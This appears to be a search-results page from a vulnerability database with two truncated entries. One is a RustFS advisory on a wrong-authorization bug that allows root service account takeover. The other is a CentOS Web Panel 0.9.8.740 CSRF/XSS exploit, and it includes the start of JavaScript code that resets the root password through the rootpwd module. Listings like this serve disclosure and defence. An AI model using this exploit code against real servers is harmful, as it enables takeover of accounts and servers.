2 matches found
RustFS: ListServiceAccount authorizes against wrong admin action, enabling cross-user enumeration and root service account takeover
Summary ListServiceAccount GET /rustfs/admin/v3/list-service-accounts?user= authorizes cross-user requests against UpdateServiceAccountAdminAction instead of ListServiceAccountsAdminAction at rustfs/src/admin/handlers/serviceaccount.rs:936. The handler accepts the wrong admin action and rejects t...
CentOS Web Panel 0.9.8.740 - Cross-Site Request Forgery Cross-Site Scripting
CentOS Web Panel 0.9.8.740 - Cross-Site Request Forgery Cross-Site Scripting Title: CentOS Web Panel Root Account Takeover + Remote Command Execution var url = "http://targetserver:2030/admin/index.php?module=rootpwd"; var params = "ifpost=yes&password1=newpassword&password2=newpassword"; var vul...